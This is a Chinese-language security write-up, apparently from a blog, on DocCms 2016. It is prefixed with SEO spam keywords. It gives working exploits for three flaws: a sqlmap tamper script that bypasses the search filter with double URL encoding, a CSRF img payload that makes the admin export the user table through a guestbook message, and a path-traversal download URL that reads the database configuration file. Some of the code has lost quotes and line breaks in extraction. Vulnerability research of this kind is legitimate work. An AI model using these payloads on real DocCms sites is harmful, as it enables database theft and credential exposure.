网站建设伍金手指下拉6,wordpress内容分页,wordpress不能置顶,顺德o2o网站建设0x01 前言 DocCms[音译#xff1a;稻壳Cms] #xff0c;定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户 量身打造的一款全新企业建站、内容管理系统#xff0c;服务于企业品牌信息化建设#xff0c;也适应用个人、门户网站建设… 0x01 前言 DocCms[音译稻壳Cms] 定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户 量身打造的一款全新企业建站、内容管理系统服务于企业品牌信息化建设也适应用个人、门户网站建设 0x02 环境搭建 DocCms官网http://www.doccms.com 程序源码DocCms2016 下载地址https://pan.baidu.com/s/1pLclifL 0x03 SQL注入 代码分析 在/content/search/index.php中首先对参数keyword进行非法字符检测 进一步追溯checkSqlStr函数看代码如何过滤在/inc/function.php中 checkSqlStr函数对传入的字符串进行正则匹配检测是否函数非法字符。 继续看在/content/search/index.php中的get_search_result函数 参数keyword进行非法字符检测后进行url解码然后拼接到SQL语句中执行。 如果我们传入双重url编码的字符串将绕过非法字符检测然后经urldecode解码带入数据库中执行导致SQL注入漏洞存在。 漏洞利用 双重URLencode编码绕过可通过编写tamper绕过URLencode双重编码tamper脚本如下 #!/usr/bin/env python
import re
from urllib import quote
from lib.core.data import kb
from lib.core.enums import PRIORITY__priority__ PRIORITY.NORMALdef dependencies():pass
def tamper(payload, **kwargs):retVal payloadretVal quote(quote(retVal)) return retVal 通过SQLMAP加载tamper脚本获取数据库敏感数据 0x04 CSRF 代码分析 在\doccms\admini\controllers\system\back.php export函数直接对提交上来的参数tables/sizelimit进行处理导出sql备份文件未对访问来源进行有效验证导致数据库备份模块存在CSRF漏洞。 漏洞利用 1、构造CSRF漏洞利用代码只备份管理员用户表doc_user H2 CRSFTester/H2
img srchttp://127.0.0.1:80/admini/index.php?msystemsbakupaexporttables[]doc_usersizelimit2048dosubmit开始备份数据 width0 height0 border0/2、在网站首页在线留言提交CSRF漏洞利用代码 3、当管理员在后台查看留言信息时自动备份数据库到/doccms/temp/data目录下 0x05 任意文件下载 代码分析 在\doccms\admini\controllers\system\back.php中, download函数只对文件名进行简单的判断然后把filename拼接到路径中进行下载导致网站存在任意文件下载漏洞。 漏洞利用 1、构造url下载全局配置文件获取敏感信息http://127.0.0.1/admini/index.php?msystemsbakupadownloadfilename../../config/doc-config-cn.php 2、获取到数据库账号密码等敏感信息 未完待续。
